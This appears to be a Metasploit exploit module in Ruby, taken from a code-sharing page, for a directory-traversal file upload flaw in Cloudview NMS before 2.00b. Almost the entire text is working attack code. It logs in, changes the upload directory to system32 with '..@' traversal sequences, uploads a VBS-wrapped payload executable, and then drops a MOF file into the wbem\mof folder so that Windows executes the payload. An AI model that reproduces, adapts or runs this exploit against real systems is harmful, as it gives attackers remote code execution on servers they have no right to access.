扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 |
require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::WbemExec def initialize(info = {}) super(update_info(info, 'Name' => 'Cloudview NMS File Upload', 'Description'=> %q{ This module exploits a file upload vulnerability found within Cloudview NMS < 2.00b. The vulnerability is triggered by sending specialized packets to the server with directory traversal sequences (..@ in this case) to browse outside of the web root. }, 'Author' => [ 'james fitts' ], 'License'=> MSF_LICENSE, 'References' => [ [ 'URL', '0day' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Payload'=> { 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets'=> [ [ 'Cloudview NMS 2.00b on Windows', {} ], ], 'DefaultTarget'=> 0, 'DisclosureDate' => 'Oct 13 2014')) register_options([ Opt::RPORT(80), OptString.new('USERNAME', [ true, "The username to log in with", "Admin" ]), OptString.new('PASSWORD', [ false, "The password to log in with", "" ]) ], self.class ) end def exploit # setup vbs_name = rand_text_alpha(rand(10)+5) + '.vbs' exe = generate_payload_exe vbs_content = Msf::Util::EXE.to_exe_vbs(exe) mof_name = rand_text_alpha(rand(10)+5) + '.vbs' mof = generate_mof(mof_name, vbs_name) peer = "#{datastore['RHOST']}:#{datastore['RPORT']}" print_status("Uploading #{vbs_name} to #{peer}...") # logging in to get the "session" @sess = rand(0..2048) res = send_request_cgi({ 'method' => 'POST', 'uri' => "/MPR=#{@sess}:/", 'version' => '1.1', 'ctype' => 'application/x-www-form-urlencoded', 'data' => "username=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}&mybutton=Login%21&donotusejava=html" }) # This is needed to setup the upload directory res = send_request_cgi({ 'method' => 'GET', 'uri' => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@!-!-!@extdir%5Cfilelistpage!-!1000", 'version' => '1.1', }) # Uploading VBS file data = Rex::MIME::Message.new data.add_part("#{vbs_content}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{vbs_name}\"") post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_") res = send_request_cgi({ 'method' => 'POST', 'uri' => "/MPR=#{@sess}:/", 'version' => '1.1', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) if res.body =~ /Uploaded file OK/ print_good("Uploaded #{vbs_name} successfully!") print_status("Uploading #{mof_name} to #{peer}...") # Setting up upload directory res = send_request_cgi({ 'method' => 'GET', 'uri' => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@wbem@mof@!-!-!@extdir%5Cfilelistpage!-!1000", 'version' => '1.1' }) # Uploading MOF file data = Rex::MIME::Message.new data.add_part("#{mof}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{mof_name}\"") post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_") res = send_request_cgi({ 'method' => 'POST', 'uri' => "/MPR=#{@sess}:/", 'version' => '1.1', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) if res.body =~ /Uploaded file OK/ print_good("Uploaded #{mof_name} successfully!") else print_error("Something went wrong...") end else print_error("Something went wrong...") end end end |
体验盒子
